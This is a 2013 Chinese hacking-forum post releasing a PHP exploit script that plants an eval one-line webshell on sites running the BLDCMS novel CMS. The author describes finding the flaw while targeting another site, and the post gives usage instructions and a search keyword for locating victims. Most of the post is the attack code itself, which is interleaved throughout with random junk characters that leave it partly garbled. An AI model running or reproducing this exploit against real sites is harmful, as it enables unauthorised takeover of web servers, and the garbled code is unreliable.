找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2291|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
- V7 g. p3 q9 g7 y% f2 X! J& x4 H& a, V" \

$ j( s) J/ }2 ]话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 $ a0 f" ?' q6 V8 S) r+ ~4 e4 `
3 ?  b- Q% g9 D, @% e
既然都有人发了 我就把我之前写好的EXP放出来吧
: n! F: y; e! V ! J: z" a8 w9 x$ O0 `8 j$ M
view source print?01.php;">8 e& T  V. x2 e! G  s0 O& J: w$ D
02.<!--?php
' n/ \& b, C' _" B03.echo "-------------------------------------------------------------------6 }( U  b6 {5 W# b" U% \1 X& }- Z4 ~* ?
04. 7 b- e7 i& _! s! e0 l: S
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP! }: l2 h" K' k9 d. D
06. * j/ T, \$ ~# {/ e( n% C2 F
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
; r1 ^4 t3 z- ?08.
$ c$ j( x" Z2 Y( J$ k4 T) }09.QQ:981009941\r\n                                2013.3.21\r\n             / O1 u0 B. f# A6 w
10.
! [0 b* s  a# o- M* l11. : O6 a$ _/ g5 F/ G4 I* J
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码- V" e5 _0 C4 q. u
13. # `' W8 U# W, T9 G0 Y- Z/ b1 T
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
1 i5 l' c" J1 d15. % H+ O- V( s8 N9 O! M7 ~# K. U4 ^
16.--------------------------------------------------------------------\r\n";% l. _) I( r! k1 S3 u- u' c7 L+ D
17.$url=$argv[1];
! e7 u3 y- e$ b9 \18.$dir=$argv[2];
$ ?& C1 y0 f7 C/ s19.$pass=$argv[3];
* s& V) E! T& h- j( h- A2 M7 q20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';( S! p: b, U1 P; V( a/ }' ]
21.if (emptyempty($pass)||emptyempty($url))! E5 s( }( p, h8 {* x, G7 Q
22.{exit("请输入参数");}4 c, o0 g( S2 w! x
23.else
$ K; x  `! q  B. D* E24.{
6 p9 ?  l1 W& v: u6 k2 `# N7 P' g& {25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev' S. d6 B8 E' C( V, M
26.   X' r0 d: H  H8 V
27.al;6 D: J2 l& H* C% |$ x
28.$length = strlen($fuckdata);
" o/ e! i! h/ I! }7 Q29.function getshell($url,$pass)
1 c) Z6 `2 P) s6 J, z30.{2 Q  l3 U! Y2 J( i! T0 u
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
+ M/ Q6 P& U& p32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";, G. t% E  A8 f! }7 N6 o0 Z! d
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";' s9 y' c, U/ Q2 w, e1 y
34.$header .= "User-Agent: MSIE\r\n";
$ n2 ~3 ?7 m- B9 M/ F; U/ O2 I$ C# O35.$header .= "Host:".$url."\r\n";
9 d5 s8 f7 U5 {6 W# k8 U$ X36.$header .= "Content-Length: ".$length."\r\n";; p& c, X" c$ m( l5 ^
37.$header .= "Connection: Close\r\n";
0 ^! q7 g8 u4 M% B* _38.$header .="\r\n";
/ p0 A0 k; a! |39.$header .= $fuckdata."\r\n\r\n";
9 Q% |, a: X* S40.$fp = fsockopen($url, 80,$errno,$errstr,15);
, |. h0 j9 C& S41.if (!$fp)2 u* [0 \/ ], W% f; H
42.{6 X4 k' L/ Q8 v5 d' x! @5 p  Q
43.exit ("利用失败:请检查指定目标是否能正常打开");
# h' f9 N8 Q9 [. l6 }- e44.}
1 Y4 s2 u' c) I( G7 H/ d45.else{ if (!fputs($fp,$header))
+ w7 L$ s7 s& l+ C! e* g46.{exit ("利用失败");}0 t" M; }. u8 g
47.else7 Q, X8 K7 ^5 M1 j2 s1 X& w1 Q- }
48.{
0 \7 A% t* J0 [7 f) H: a49.$receive = '';
4 H/ ~: B; \  K/ r. n7 V/ Q% t% t% k50.while (!feof($fp)) {
# X9 \% u( D) D' N7 b' |( ~5 [: q51.$receive .= @fgets($fp, 1000);
, h& y/ S6 }- z. F* b' ]. w: _$ ^! T52.}
  r3 J, \  {- a+ z9 k53.@fclose($fp);
' a2 w) z1 h4 c4 |54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标, n0 y. I* h" b9 A9 ^0 I9 j% b' P
55. 5 c# j: x" k! D9 R) A6 L
56.GPC是否=off)";) S5 b/ S$ k; [! q3 [, ?; u
57.}}( Y9 ]6 j  T1 c; F' }
58.}0 V/ F1 L  u+ d0 X0 b( t# I  v* B
59.}- O& ~  n7 ]- [( W
60.getshell($url,$pass);  r% s5 ~) ~8 R" B
61.?-->$ ~1 q+ F- {* A2 F0 w& D! U9 G

# U, N1 K* f* J: W" s7 m( _+ ?
* {5 `7 G( [2 K& E3 j& W
; f+ U2 c: m" G, A; K. u+ pby 数据流
" Q! L7 M. F$ b/ k, j7 T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表